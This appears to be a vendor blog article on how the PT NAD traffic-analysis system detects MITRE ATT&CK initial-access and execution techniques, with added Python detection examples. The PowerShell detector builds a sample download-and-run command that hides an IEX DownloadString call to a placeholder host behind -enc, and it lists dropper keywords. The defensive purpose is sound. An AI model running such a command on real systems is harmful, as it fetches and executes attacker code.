How Traffic Analysis Systems Detect MITRE ATT&CK Attacker Tactics, Using PT Network Attack Discovery as an Example



According to Verizon, most (87%) information security incidents take only minutes to carry out, while 68% of companies need months to detect them. This is confirmed by a Ponemon Institute study, according to which organizations take an average of 206 days to detect an incident. Our own investigation experience shows that attackers can control a company's infrastructure for years without being detected. In one organization where our experts investigated an information security incident, it turned out that the attackers had full control over the entire infrastructure and had been regularly stealing sensitive information for eight years.

Suppose you already have a SIEM that collects logs and analyzes events, and antivirus is installed on the endpoints. Nonetheless, not everything can be detected with a SIEM, and it is rarely possible to deploy EDR across the entire network, so blind spots cannot be avoided. Network traffic analysis (NTA) systems help to cover them. These solutions reveal attacker activity at the earliest stage of penetrating the network, as well as during attempts to gain a foothold and develop the attack inside the network.

There are two types of NTA systems: some work with NetFlow, others analyze raw traffic. The advantage of the second type is that it can store recordings of raw traffic. Thanks to this, an information security specialist can verify whether an attack succeeded, localize the threat, understand how the attack unfolded, and work out how to prevent a similar one in the future.

We will show how, by direct or indirect signs, NTA can identify all known attack tactics described in the MITRE ATT&CK knowledge base. We will go through each of the 12 tactics, analyze the techniques that can be detected in traffic, and demonstrate their detection with our NTA system.

About the ATT&CK Knowledge Base


MITRE ATT&CK is a public knowledge base developed and maintained by the MITRE Corporation based on analysis of real APT campaigns. It is a structured set of tactics and techniques used by attackers, which lets information security professionals around the world speak the same language. The base is constantly expanding and being updated with new knowledge.

The knowledge base distinguishes 12 tactics, corresponding to the stages of a cyber attack:

  • initial access;
  • execution;
  • persistence;
  • privilege escalation;
  • defense evasion;
  • credential access;
  • discovery;
  • lateral movement;
  • collection;
  • command and control;
  • exfiltration;
  • impact.

For each tactic, the ATT&CK knowledge base lists the techniques that help attackers achieve their goal at that stage of the attack. Since the same technique can be used at different stages, it can belong to several tactics.

The description of each technique includes:

  • identifier;
  • list of tactics in which it is applied;
  • examples of use by APT groups;
  • measures to reduce damage from its use;
  • detection recommendations.

Information security specialists can use the knowledge base to structure information about current attack methods and build an effective defense with this in mind. Understanding how real APT groups operate can also be a source of hypotheses for proactive threat hunting.

About PT Network Attack Discovery


We will identify the use of techniques from the ATT&CK matrix using PT Network Attack Discovery, the Positive Technologies NTA system designed to detect attacks on the perimeter and inside the network. PT NAD covers, to varying degrees, all 12 tactics of the MITRE ATT&CK matrix. It is strongest at identifying initial access, lateral movement, and command and control techniques: in these tactics PT NAD covers more than half of the known techniques, revealing their use by direct or indirect signs.

The system detects attacks that use ATT&CK techniques by means of detection rules written by the PT Expert Security Center (PT ESC) team, machine learning, indicators of compromise, deep analytics, and retrospective analysis. Real-time traffic analysis combined with retrospective analysis makes it possible to identify currently hidden malicious activity and to trace attack vectors and the history of an attack.

Below is the full mapping of PT NAD to the MITRE ATT&CK matrix. The picture is large, so we suggest opening it in a separate window.

Initial access



The initial access tactic includes techniques for penetrating the company's network. The attackers' goal at this stage is to deliver malicious code to the target system and to ensure it can be executed later.

Traffic analysis with PT NAD reveals seven techniques for gaining initial access:

1. T1189: drive-by compromise


A technique in which the victim visits a website that the attackers use to exploit the web browser or to obtain application access tokens.

What PT NAD does: if the web traffic is not encrypted, PT NAD inspects the contents of HTTP server responses, since that is where the exploits that let attackers execute arbitrary code inside the browser are delivered. PT NAD automatically detects such exploits with detection rules.

In addition, PT NAD detects the threat one step earlier: rules and indicators of compromise fire when a user visits a site that redirects them to a site hosting an exploit kit.

2. T1190: exploit public-facing application


Exploitation of vulnerabilities in services accessible from the Internet.

What PT NAD does: performs deep inspection of packet contents, revealing signs of anomalous activity. In particular, there are rules for detecting attacks on major content management systems (CMS), on the web interfaces of network equipment, and on mail and FTP servers.

3. T1133: external remote services


Use of remote access services by attackers to connect to internal network resources from outside.

What PT NAD does: since the system recognizes protocols by packet contents rather than by port numbers, users can filter traffic to find all remote-access protocol sessions and check their legitimacy.
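To make the "by content, not by port" point concrete, here is an added example (not PT NAD's own parsers, which are far more complete) that fingerprints the first client bytes of a TCP stream and flags remote-access protocols wherever they appear. The flows, addresses and payloads are constructed; the byte patterns are the public ones from the protocol specifications (SSH identification string, RFB version string, TPKT/X.224 connection request for RDP, TLS ClientHello, SOCKS5 greeting).

```python
"""Recognize remote-access protocols by payload content, not by destination port.

Added example: a few byte-level fingerprints applied to the first bytes a client
sends. Sample flows below are constructed, not real captures.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int
    first_bytes: bytes  # first payload bytes sent by the client


# Ports these protocols are normally found on: used only to annotate, never to identify.
EXPECTED_PORTS = {"ssh": {22}, "rdp": {3389}, "vnc": set(range(5900, 5910)), "socks5": {1080}}
REMOTE_ACCESS = {"ssh", "rdp", "vnc", "socks5"}


def fingerprint(p: bytes) -> str:
    """Return the protocol name inferred purely from the payload content."""
    if p.startswith(b"SSH-"):                                    # SSH identification string (RFC 4253)
        return "ssh"
    if p.startswith(b"RFB "):                                    # RFB/VNC protocol version string
        return "vnc"
    if len(p) >= 6 and p[0] == 0x03 and p[1] == 0x00 and p[5] == 0xE0:
        return "rdp"                                             # TPKT header + X.224 Connection Request
    if len(p) >= 6 and p[0] == 0x16 and p[1] == 0x03 and p[5] == 0x01:
        return "tls"                                             # TLS handshake record carrying a ClientHello
    if len(p) >= 3 and p[0] == 0x05 and 1 <= p[1] <= 255 and len(p) == 2 + p[1]:
        return "socks5"                                          # SOCKS5 greeting: ver, nmethods, methods
    return "unknown"


def find_remote_access(flows):
    """Return one finding per remote-access session, noting whether the port is the usual one."""
    hits = []
    for f in flows:
        proto = fingerprint(f.first_bytes)
        if proto not in REMOTE_ACCESS:
            continue
        note = "expected port" if f.dport in EXPECTED_PORTS[proto] else f"non-standard port {f.dport}"
        hits.append({"src": f.src, "dst": f.dst, "dport": f.dport, "proto": proto, "note": note})
    return hits


# Constructed sample flows (addresses from documentation ranges, payloads hand-built).
SAMPLE_FLOWS = [
    Flow("203.0.113.10", "10.0.0.5", 443, b"SSH-2.0-OpenSSH_8.2\r\n"),              # SSH hidden on 443
    Flow("203.0.113.11", "10.0.0.6", 3389,                                           # RDP X.224 CR + RDP_NEG_REQ
         bytes.fromhex("03 00 00 13 0e e0 00 00 00 00 00 01 00 08 00 03 00 00 00")),
    Flow("203.0.113.12", "10.0.0.7", 443, bytes.fromhex("16 03 01 00 05 01 00 00 01 00")),  # TLS, not remote access
    Flow("10.0.0.20", "10.0.0.8", 8080, bytes([0x05, 0x01, 0x00])),                  # SOCKS5 on an odd port
]

if __name__ == "__main__":
    for hit in find_remote_access(SAMPLE_FLOWS):
        print(hit)
```

In a real deployment the "non-standard port" note is the interesting one for T1133: an SSH banner on 443 or a SOCKS5 greeting on 8080 is exactly the kind of session an analyst filters for and then checks against the list of sanctioned remote-access paths.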

4. T1193: spearphishing attachment


This is the familiar phishing attachment.

What PT NAD does: automatically extracts files from traffic and checks them against indicators of compromise. Executable files in attachments are detected by rules that analyze the contents of mail traffic; in a corporate environment such an attachment is considered anomalous.
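The two checks described above (extract the attachment, then judge it by content and by indicator) look like this in an added example that is not PT NAD code. It uses the Python standard library only: the mail is constructed in the block itself, the "executable" is just an MZ header followed by zeros, and the IoC set contains that sample's own SHA-256 so the match is reproducible. The classification is by magic bytes, so a PE file renamed to .pdf is still flagged.

```python
"""Extract mail attachments and flag executables and IoC hash matches.

Added example, not PT NAD code. The sample message, the fake PE payload and
the IoC hash set are all constructed here.
"""
import hashlib
from email import message_from_bytes, policy
from email.message import EmailMessage

# File-type detection by leading bytes, independent of the declared name or MIME type.
MAGIC = {
    b"MZ": "pe-executable",
    b"PK\x03\x04": "zip-container",       # also docx/xlsx/pptx, i.e. possible macro carriers
    b"\xd0\xcf\x11\xe0": "ole-compound",  # legacy .doc/.xls, a classic macro carrier
    b"%PDF": "pdf",
}


def classify(data: bytes) -> str:
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def extract_attachments(raw_mail: bytes):
    """Return (filename, bytes) for every attachment in an RFC 5322 message seen on the wire."""
    msg = message_from_bytes(raw_mail, policy=policy.default)
    return [(part.get_filename(), part.get_content()) for part in msg.iter_attachments()]


def analyze(raw_mail: bytes, ioc_sha256: set):
    """One finding per attachment with the reasons it should be looked at, if any."""
    findings = []
    for name, data in extract_attachments(raw_mail):
        kind = classify(data)
        digest = hashlib.sha256(data).hexdigest()
        reasons = []
        if kind == "pe-executable":
            reasons.append("executable attachment")
            if name and not name.lower().endswith((".exe", ".dll", ".scr")):
                reasons.append("extension does not match content")
        if digest in ioc_sha256:
            reasons.append("hash matches IoC")
        findings.append({"name": name, "kind": kind, "sha256": digest, "reasons": reasons})
    return findings


# Constructed sample: an MZ header plus padding stands in for a real binary.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60
SAMPLE_IOCS = {hashlib.sha256(FAKE_PE).hexdigest()}  # constructed IoC list


def build_sample_mail() -> bytes:
    """Constructed phishing mail: the fake PE is sent under a .pdf name and MIME type."""
    msg = EmailMessage()
    msg["From"] = "accounting@example.com"
    msg["To"] = "user@example.com"
    msg["Subject"] = "Invoice 2020-04"
    msg.set_content("Please see the attached invoice.")
    msg.add_attachment(FAKE_PE, maintype="application", subtype="pdf", filename="invoice.pdf")
    return msg.as_bytes()  # what an SMTP DATA segment would carry


if __name__ == "__main__":
    for finding in analyze(build_sample_mail(), SAMPLE_IOCS):
        print(finding)
```

The order of the checks matters: the hash comparison only catches samples already known, while the content check catches a renamed executable on the first sighting, which is why both are applied to every extracted file.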

5. T1192: spearphishing link


Use of phishing links. The technique involves sending phishing emails containing a link that, when clicked, downloads malware. The link is usually accompanied by text written according to all the rules of social engineering.

What PT NAD does: detects phishing links using indicators of compromise. For example, in the PT NAD interface we see a session with an HTTP connection to a link from the phishing-urls list.



A link from the phishing-urls list of indicators of compromise

6. T1199: trusted relationship


Access to the victim's network through third parties with whom the victim has a trusted relationship. Attackers can compromise a trusted organization and connect through it to the target network, using VPN connections or domain trusts, both of which can be detected by traffic analysis.

What PT NAD does: parses application-layer protocols and saves the parsed fields to a database, so an information security analyst can use filters to find all suspicious VPN connections or cross-domain connections.

7. T1078: valid accounts


Use of default, local, or domain credentials for authentication on external and internal services.

What PT NAD does: automatically extracts credentials from HTTP, FTP, SMTP, POP3, IMAP, SMB, DCE/RPC, SOCKS5, LDAP, and Kerberos. As a rule, this is the username, the password, and a flag indicating whether authentication succeeded. When credentials were used, they are displayed in the corresponding session card.
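The "username, password and success flag" triple is easiest to see on the two cleartext protocols in that list. The added example below (not PT NAD code) extracts it from an HTTP Basic request/response pair and from an FTP control-channel dialogue; it also shows the part a naive extractor misses, namely that the success flag comes from the server's reply, not from the presence of credentials. The request, responses and FTP dialogue are constructed.

```python
"""Extract credentials and an authentication-success flag from cleartext protocols.

Added example, not PT NAD code. The HTTP request/responses and the FTP
dialogue are constructed samples.
"""
import base64
import re

AUTH_HEADER = re.compile(rb"\r\nAuthorization:[ \t]*Basic[ \t]+([A-Za-z0-9+/=]+)", re.I)


def http_basic_credentials(request: bytes, response: bytes):
    """Decode an HTTP Basic header; success is judged from the response status code."""
    m = AUTH_HEADER.search(request)
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:
        return None
    user, _, password = decoded.partition(":")        # RFC 7617: user-id ":" password
    status = int(response.split(b" ", 2)[1])
    return {"proto": "http", "user": user, "password": password, "success": status not in (401, 403)}


def ftp_credentials(dialogue):
    """dialogue: list of (direction, line), direction 'c' for client, 's' for server.

    Returns one record per login attempt, so a brute-force session yields several
    failed records followed (possibly) by a successful one.
    """
    results, user, password = [], None, None
    for who, line in dialogue:
        if who == "c":
            verb, _, arg = line.strip().partition(" ")
            if verb.upper() == "USER":
                user, password = arg, None
            elif verb.upper() == "PASS":
                password = arg
        elif who == "s" and password is not None:     # only replies to PASS decide the outcome
            code = line[:3]
            if code == "230":
                results.append({"proto": "ftp", "user": user, "password": password, "success": True})
                user = password = None
            elif code[:1] in ("4", "5"):
                results.append({"proto": "ftp", "user": user, "password": password, "success": False})
                password = None
    return results


# Constructed samples
REQ_BASIC = (b"GET /admin HTTP/1.1\r\nHost: intranet.example\r\nAuthorization: Basic "
             + base64.b64encode(b"admin:Winter2020") + b"\r\n\r\n")
RESP_OK = b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"
RESP_DENIED = b"HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: Basic realm=\"intranet\"\r\n\r\n"
FTP_DIALOGUE = [
    ("s", "220 ftp ready"),
    ("c", "USER backup"), ("s", "331 Password required"),
    ("c", "PASS wrong"), ("s", "530 Login incorrect"),
    ("c", "USER backup"), ("s", "331 Password required"),
    ("c", "PASS Backup2020!"), ("s", "230 Login successful"),
]

if __name__ == "__main__":
    print(http_basic_credentials(REQ_BASIC, RESP_OK))
    print(http_basic_credentials(REQ_BASIC, RESP_DENIED))
    for record in ftp_credentials(FTP_DIALOGUE):
        print(record)
```

A failed attempt is as useful as a successful one for T1078: a burst of records with success=False against one account, followed by one with success=True, is password guessing that finally worked, and the session card for the successful one tells you which host to look at next.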

Execution


The execution tactic includes techniques that attackers use to run code on compromised systems. Running malicious code helps attackers consolidate their presence (persistence) and expand access to remote systems on the network (lateral movement).

PT NAD can detect attackers' use of 14 techniques for executing malicious code.

1. T1191: CMSTP (Microsoft Connection Manager Profile Installer)


A technique in which attackers prepare a specially crafted malicious INF file for the CMSTP.exe utility (the Connection Manager Profile Installer) built into Windows. CMSTP.exe takes the file as a parameter and installs a service profile for a remote connection. As a result, CMSTP.exe can be used to download and execute dynamic-link libraries (.dll) or scriptlets (.sct) from remote servers.

What PT NAD does: automatically detects the transfer of such .inf files in HTTP traffic. In addition, it detects the transfer of malicious scriptlets and DLLs over HTTP from a remote server.

2. T1059: command-line interface


Interaction with the command-line interface, locally or remotely, for example via remote access utilities.

What PT NAD does: automatically detects the presence of shells by the responses to commands that launch various command-line utilities, such as ping or ifconfig.

3. T1175: component object model and distributed COM


Use of COM or DCOM to execute code on local or remote systems while moving through the network.

What PT NAD does: detects suspicious DCOM calls that attackers typically use to launch programs.

4. T1203: exploitation for client execution


Exploitation of vulnerabilities to execute arbitrary code on a workstation. The most useful exploits for attackers are those that allow code execution on a remote system, since they give attackers access to that system. The technique can be carried out in the following ways: a malicious email campaign, a website with browser exploits, or remote exploitation of application vulnerabilities.

What PT NAD does: while parsing mail traffic, PT NAD checks attachments for executable files and automatically extracts office documents, which may contain exploits, from emails. Exploitation attempts are visible in traffic, and PT NAD detects them automatically.

5. T1170: mshta


Use of the mshta.exe utility, which runs Microsoft HTML Applications (HTA files with the .hta extension). Since mshta processes files bypassing browser security settings, attackers can use mshta.exe to execute malicious HTA, JavaScript, or VBScript files.

What PT NAD does: .hta files executed via mshta are also transferred over the network, where they are visible in traffic. PT NAD automatically detects the transfer of such malicious files. It captures the files, and information about them can be viewed in the session card.

6. T1086: PowerShell


Use of PowerShell to search for information and execute malicious code.

What PT NAD does: when attackers use PowerShell remotely, PT NAD detects it with rules. It detects PowerShell keywords most often used in malicious scripts, as well as the transfer of PowerShell scripts over SMB.
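Keyword matching on PowerShell seen in traffic has one well-known blind spot: the interesting keywords are usually inside a -EncodedCommand payload, which is base64 of UTF-16LE text. The added example below (not PT NAD's rule set) scores a command line for common dropper keywords, peels that one encoding layer, and scores the decoded text too. The keyword list is a short illustrative selection, and the sample one-liner is constructed in the block.

```python
"""Score PowerShell command lines seen in traffic, including -EncodedCommand payloads.

Added example, not PT NAD rules. The keyword list is illustrative and the
sample command line is constructed here (its URL is a documentation address).
"""
import base64
import re

# Keywords that are common in droppers and rare in routine administration.
SUSPICIOUS = {
    "iex": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "encoded": re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "hidden": re.compile(r"-(?:WindowStyle\s+)?Hidden|-w\s+hidden", re.I),
    "base64": re.compile(r"FromBase64String", re.I),
    "nop": re.compile(r"-nop\b|-NoProfile", re.I),
}
ENCODED = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_powershell(text: str):
    """Match keywords against the command line and, if present, its decoded payload."""
    layers, hits = [text], set()
    decoded = decode_encoded_command(text)
    if decoded is not None:
        layers.append(decoded)
    for layer in layers:
        for name, rx in SUSPICIOUS.items():
            if rx.search(layer):
                hits.add(name)
    return {"hits": sorted(hits), "decoded": decoded, "score": len(hits)}


def make_sample() -> str:
    """Constructed sample: a typical download-and-run one-liner hidden behind -enc."""
    inner = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')"
    b64 = base64.b64encode(inner.encode("utf-16-le")).decode()
    return f"powershell.exe -nop -w hidden -enc {b64}"


if __name__ == "__main__":
    print(inspect_powershell(make_sample()))
    print(inspect_powershell("Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }"))
```

Without the decoding step the sample scores only on its launcher flags (-nop, -w hidden, -enc); the download and IEX keywords, which are what an analyst actually wants to see in the session card, only appear after the payload is decoded. Real droppers often nest further layers (FromBase64String inside the decoded text, compression), which is why that keyword is in the list as a prompt to keep peeling.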

7. T1053: scheduled task


Use of the Windows Task Scheduler and other utilities to automatically launch programs or scripts at a specific time.

What PT NAD does: attackers usually create such tasks remotely, which means that these sessions are visible in traffic. PT NAD automatically detects suspicious task creation and modification operations performed via the ATSVC and ITaskSchedulerService RPC interfaces.

8. T1064: scripting


Execution of scripts to automate various attacker actions.

What PT NAD does: reveals script transfers over the network, that is, before the scripts are launched. It detects script content in raw traffic and the transfer of files with extensions corresponding to popular scripting languages.

9. T1035: service execution


Running an executable file, command-line instructions, or a script by interacting with Windows services, for example the Service Control Manager (SCM).

What PT NAD does: inspects SMB traffic and, using rules, detects calls to the SCM for creating, modifying, and starting a service.

The service execution technique can be carried out with the PsExec remote command execution utility. PT NAD parses the SMB protocol and detects the use of PsExec when it uses the PSEXESVC.exe file or the standard PSEXESVC service name to execute code on a remote machine. The user then needs to check the list of executed commands and whether remote command execution from that host is legitimate.




PsExec detection
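The PsExec indicators named above (the PSEXESVC.exe file copied to the admin share, the PSEXESVC service and its named pipes, and the svcctl pipe used to talk to the SCM) all travel inside SMB as UTF-16LE names, which makes a narrow detection possible without a full SMB2 parser. The added example below (not PT NAD's SMB parser) extracts UTF-16LE string runs from SMB message bodies and matches them against those names. The SMB messages are constructed stand-ins: they carry the SMB2 protocol identifier and a name in the position an SMB2 CREATE request would, and nothing else.

```python
"""Spot PsExec by the names it leaves in SMB traffic.

Added example, not PT NAD code. The SMB2 messages below are constructed
stand-ins, not real captures; only the name field is meaningful.
"""
import re

# SMB2 carries file, share and pipe names as UTF-16LE: printable ASCII code points
# encoded that way appear as "char, 0x00" pairs.
UTF16LE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")

PSEXEC_MARKERS = {
    "psexesvc-binary": re.compile(r"PSEXESVC\.exe$", re.I),         # service binary copied to ADMIN$
    "psexesvc-pipe": re.compile(r"^PSEXESVC(?:-[^\\]+)?$", re.I),   # service pipe and -stdin/-stdout/-stderr pipes
    "scm-pipe": re.compile(r"^svcctl$", re.I),                      # SCM RPC endpoint used to create/start the service
}


def utf16_strings(payload: bytes):
    """All printable UTF-16LE runs of at least four characters in an SMB message body."""
    return [m.group(0).decode("utf-16-le") for m in UTF16LE_RUN.finditer(payload)]


def detect_psexec(sessions):
    """sessions: list of (client, server, smb_payload). One finding per matching name."""
    findings = []
    for client, server, payload in sessions:
        for s in utf16_strings(payload):
            name = s.rsplit("\\", 1)[-1]          # compare the last path component only
            for label, rx in PSEXEC_MARKERS.items():
                if rx.search(name):
                    findings.append({"client": client, "server": server, "indicator": label, "name": s})
    return findings


def smb2_create(name: str) -> bytes:
    """Constructed SMB2 CREATE-like message: protocol id, zeroed header and fixed fields, then the name.

    A real parser would read NameOffset/NameLength from the CREATE request; here the
    name simply sits after 64 header bytes and the 57-byte fixed part, as it would on the wire.
    """
    return b"\xfeSMB" + b"\x00" * 60 + b"\x39\x00" + b"\x00" * 55 + name.encode("utf-16-le")


# Constructed sessions from one client against one server (a typical PsExec run), plus a benign one.
SAMPLE_SESSIONS = [
    ("10.0.0.20", "10.0.0.8", smb2_create("PSEXESVC.exe")),               # upload of the service binary
    ("10.0.0.20", "10.0.0.8", smb2_create("svcctl")),                     # open SCM pipe to create/start it
    ("10.0.0.20", "10.0.0.8", smb2_create("PSEXESVC-WS01-4321-stdin")),   # I/O pipe for the remote shell
    ("10.0.0.21", "10.0.0.8", smb2_create("Reports\\2020\\q1.xlsx")),     # ordinary file access
]

if __name__ == "__main__":
    for finding in detect_psexec(SAMPLE_SESSIONS):
        print(finding)
```

The svcctl match alone is not evidence of PsExec (any remote service management hits that pipe), which is why it is reported as a separate indicator; the binary upload and the PSEXESVC pipe from the same client in the same time window are what turn it into the finding the text describes. Attackers who rename the service with psexec's -r option defeat the name match, so the SCM-level detection of service creation mentioned above is the more robust signal.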

10. T1072: third-party software


A technique in which attackers gain access to remote administration software or a corporate software deployment system and use it to launch malicious code. Examples of such software: SCCM, VNC, TeamViewer, HBSS, Altiris.

Incidentally, the technique is especially relevant given the massive shift to remote work and, as a result, the connection of numerous insecure home devices over questionable remote access channels.

What PT NAD does: automatically detects the operation of such software on the network. For example, rules fire on VNC connections and on the activity of the EvilVNC trojan, which covertly installs a VNC server on the victim's host and starts it automatically. PT NAD also automatically detects the TeamViewer protocol, which helps the analyst use a filter to find all such sessions and verify their legitimacy.

11. T1204: user execution


A technique in which a user runs files that can lead to code execution, for example by opening an executable file or an office document with a macro.

What PT NAD does: sees such files at the transfer stage, before they are launched. Information about them can be examined in the cards of the sessions in which they were transmitted.

12. T1047: Windows Management Instrumentation


Use of WMI, which provides local and remote access to Windows system components. With WMI, attackers can interact with local and remote systems and perform many tasks, for example gathering information for reconnaissance and remotely starting processes during lateral movement.

What PT NAD does: since interactions with remote systems via WMI are visible in traffic, PT NAD automatically detects network requests that establish WMI sessions and checks traffic for the transfer of scripts that use WMI.

13. T1028: Windows Remote Management


Use of the Windows service and protocol that allows a user to interact with remote systems.

What PT NAD does: sees network connections established via Windows Remote Management. Such sessions are detected automatically by rules.

14. T1220: XSL (Extensible Stylesheet Language) script processing


The XSL markup language describes the processing and rendering of data in XML files. To support complex operations, the XSL standard includes support for embedded scripts in several languages. These languages allow arbitrary code execution, which leads to bypassing whitelist-based security policies.

What PT NAD does: reveals transfers of such files over the network, that is, before they are launched. It automatically detects XSL files transmitted over the network and files with anomalous XSL markup.

In the following articles, we will look at how the PT Network Attack Discovery NTA system detects the other MITRE ATT&CK tactics and techniques. Stay tuned!

Authors:
  • (PT Expert Security Center), Positive Technologies
  • Positive Technologies
